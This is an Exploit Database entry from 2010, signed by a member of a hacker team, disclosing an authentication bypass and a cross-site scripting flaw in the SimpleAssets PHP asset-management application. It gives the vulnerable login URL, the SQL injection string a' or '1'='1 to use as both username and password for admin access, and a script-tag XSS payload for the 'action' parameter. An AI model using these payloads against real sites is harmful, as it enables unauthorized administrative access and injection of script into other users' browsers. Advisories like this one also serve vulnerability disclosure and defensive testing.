SimpleAssets – Authentication Bypass / Cross-Site Scripting

• Exploit Database
• 12 阅读

• 作者： L0rd CrusAd3r
  日期： 2010-06-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13944/

• 1 ########################################## 1
  0 I'm L0rd CrusAd3r member from Inj3ct0r Team1
  1 ########################################## 0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
  Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
  Exploit Title:SimpleAssets Authentication Bypass & XSS Vulnerability 
  Vendor url:http://simpleassets.sourceforge.net/
  Version:n/a	
  Price:n/a
  Published: 2010-06-21
  Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.
  Special Greetz: Topsecure.net, inj3ct0r Team
  Shoutzz:- To all ICW members
  
  ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
  Description:
  
  SimpleAssets is a web based asset management system to track assets, employees, software licenses, ip addresses and asset sign in and sign out. Supports importing from existing DB's. An online demo is available to try before you download. (PHP/MySQL) Code: PHP 4.0 
  
  ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
  
  Vulnerability:
  
  *Authentication Bypass found
   
  The Provided Script as Sqli Vulnerability in Admin Login page
   
  DEMO URL : http://server/simpleassets/index.php?action=login&lastaction=&lastkey=&loginout=2
   
  Use the string a' or '1'='1 for Username and Password to gain access.
  
  
  
  *XSS Vulnerability
  
  Parameter: '"--><script>alert(0x000872)</script>
  
  Demo URL:-http://server/simpleassets/index.php?action=[xss]
   
  
  # 0day n0 m0re #
  # L0rd CrusAd3r #